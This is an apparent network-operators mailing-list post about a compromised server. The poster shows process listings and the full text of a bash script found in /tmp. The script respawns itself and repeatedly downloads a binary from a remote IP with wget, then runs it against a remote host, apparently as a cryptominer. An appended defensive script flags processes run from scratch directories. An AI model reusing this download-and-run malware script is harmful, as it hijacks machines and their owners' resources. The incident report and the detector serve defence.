Hi all, Not usually a post you see on uknof, but wanted some help and to check if anyone else has seen this?
We've just started getting alerts from one of our servers for high load and discovered a weird process:

    nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 bash /tmp/toplel
    nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752

    root@hostname:/tmp# ls -lh
    total 1016K
    -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 lllll
    -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel
    -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t

No idea where it came from. All our stuff has OpenSSL updated as is our Nagios.

w00t is a binary, toplel is a bash script containing:

    #!/bin/bash
    if [ $1 -le 10 ] ; then
        NUM = $(expr $1 + 1)
        nohup bash $0 $NUM >/dev/null 2>&1 &
        exit
    fi
    CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
    FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
    FREE=$(expr $FREE - 52428800)
    FREE=$(expr $FREE / $CORECOUNT)
    while true; do
        killall w00t
        wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
        chmod 777 /tmp/w00t
        /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
        wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
        chmod 777 /tmp/w00t
        /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
        sleep 300
    done;

--
Kind Regards,
Gavin Henry.
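A defender-side check for the pattern visible in the process listing above, as an added example that is not part of the original post: it reads `ps auxf`-style lines and flags any process whose executable, or the script handed to an interpreter, lives in a world-writable scratch directory. The function names `flag_scratch_procs` and `sample_ps` are hypothetical, and the sample input is the two process lines from the post plus a constructed header and a constructed benign `sshd` line.

```shell
#!/bin/sh
# Added example: flag processes started from /tmp, /var/tmp or /dev/shm.

# Reads ps aux / ps auxf lines on stdin; prints "PID USER PATH" per hit.
flag_scratch_procs() {
    awk '
    $2 ~ /^[0-9]+$/ {                        # skip the header line
        i = 11                               # COMMAND starts at field 11
        # Skip the tree-drawing tokens that ps auxf puts before child commands.
        while (i <= NF && ($i == "\\_" || $i == "|")) i++
        exe = $i
        n = split(exe, parts, "/"); base = parts[n]
        # For an interpreter, the interesting path is the script it runs.
        if (base ~ /^(sh|bash|dash|perl|python[0-9.]*|php)$/) {
            i++
            while (i <= NF && $i ~ /^-/) i++  # skip interpreter options
            if (i <= NF) exe = $i
        }
        if (exe ~ /^\/(tmp|var\/tmp|dev\/shm)\//) print $2, $1, exe
    }'
}

# Sample input: two lines from the post, header and sshd line constructed.
sample_ps() {
    cat <<'EOF'
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1021 0.0 0.1 72300 5600 ? Ss Apr19 0:00 /usr/sbin/sshd -D
nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 bash /tmp/toplel
nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752
EOF
}

sample_ps | flag_scratch_procs
```

On a live host, pipe `ps auxf` into `flag_scratch_procs` instead of the sample. A hit under a service account such as `nagios` is a reason to preserve the files and the account's recent activity before cleaning up.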
